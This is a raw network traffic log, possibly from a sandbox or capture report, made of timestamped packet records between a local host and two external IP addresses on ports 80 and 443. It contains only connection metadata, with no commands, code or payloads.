Sep 4, 2024 17:37:07.560555935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.560563087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.560564995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.560575962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.560602903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.571737051 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:07.571801901 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:07.575102091 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:07.575109959 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:07.575361967 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:07.575428963 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:07.575701952 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:07.620506048 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:07.643095970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643121004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643132925 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643165112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.643184900 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.643222094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643233061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643260002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.643280029 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.643354893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643367052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643377066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643388987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643399954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643414974 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.643433094 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.643595934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643609047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643619061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643644094 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.643661976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.643748045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643769026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643779993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643788099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643794060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.643798113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643809080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.643810034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643821955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643834114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.643841028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.643862009 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.643888950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644048929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644062996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644098043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644110918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644181967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644195080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644205093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644215107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644224882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644227982 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644236088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644244909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644253016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644256115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644268990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644269943 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644279957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644284964 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644290924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644309998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644330025 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644732952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644743919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644753933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644763947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644774914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644782066 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644788980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644793034 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644800901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644810915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644813061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644824982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644834995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644839048 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644848108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.644860029 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644887924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.644887924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.645904064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.645947933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.645951033 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.645987988 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.645992994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646007061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646033049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.646044970 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.646079063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646090984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646100044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646122932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.646147013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.646290064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646300077 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646305084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646311998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646322012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646331072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646337986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.646338940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646353006 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.646357059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646374941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.646394014 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.646544933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646554947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646589041 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.646682024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646697044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646708012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646717072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646723986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.646728039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646732092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.646740913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646750927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646750927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.646760941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646771908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.646773100 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.646786928 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.646806955 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.647078037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647089958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647099972 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647110939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647121906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647121906 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.647133112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.647161007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.647346973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647357941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647366047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647375107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647387028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.647392035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647404909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.647408009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647419930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647419930 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.647429943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647440910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647447109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.647449970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647452116 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.647461891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647470951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647471905 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.647481918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647490978 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.647491932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647504091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647506952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.647517920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647526979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.647530079 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.647538900 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.647561073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.648184061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648200035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648212910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648222923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648231030 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.648236036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648245096 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.648252964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648264885 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648273945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648277044 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.648283958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.648283958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648297071 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648308039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648312092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.648318052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648329020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648339033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648339033 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.648349047 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.648350954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648364067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648365974 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.648375988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648385048 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.648389101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648401976 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648411989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.648416042 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.648436069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.648452997 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.649065971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.649084091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.649095058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.649105072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.649111986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.649116039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.649127007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.649127007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.649138927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.649152040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.649156094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.649167061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.649190903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.725645065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.725687027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.725698948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.725711107 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.725733042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.725789070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.725800991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.725826025 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.725841999 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.725913048 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.725924969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.725934029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.725944996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.725946903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.725955009 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.725955963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.725974083 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.725994110 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.726161003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726171970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726181030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726191044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726198912 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.726201057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726212978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726222038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.726236105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.726260900 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.726438999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726454020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726464033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726475000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726484060 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726484060 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.726492882 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.726522923 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.726711035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726722002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726731062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726741076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726751089 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.726752996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.726763010 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.726789951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.727149963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727160931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727169991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727179050 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727189064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727194071 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.727197886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727202892 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.727209091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727219105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727227926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727230072 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.727240086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727250099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727253914 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.727266073 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.727287054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.727442980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727487087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.727523088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727535009 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727543116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727554083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727564096 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727565050 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.727588892 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.727600098 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.727757931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727801085 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.727804899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727816105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727826118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.727844954 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.727865934 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728084087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728102922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728111982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728116989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728121996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728123903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728131056 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728132963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728143930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728148937 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728152990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728163958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728171110 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728173971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728190899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728193998 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728215933 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728223085 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728704929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728728056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728739023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728749990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728750944 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728760958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728770971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728771925 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728784084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728794098 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728796959 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728805065 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728806019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728816986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728827953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728831053 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728838921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728848934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728856087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728861094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728872061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728873968 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728883028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728883028 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.728894949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728905916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.728910923 CEST	49717	80	192.168.2.6	147.45.44.104
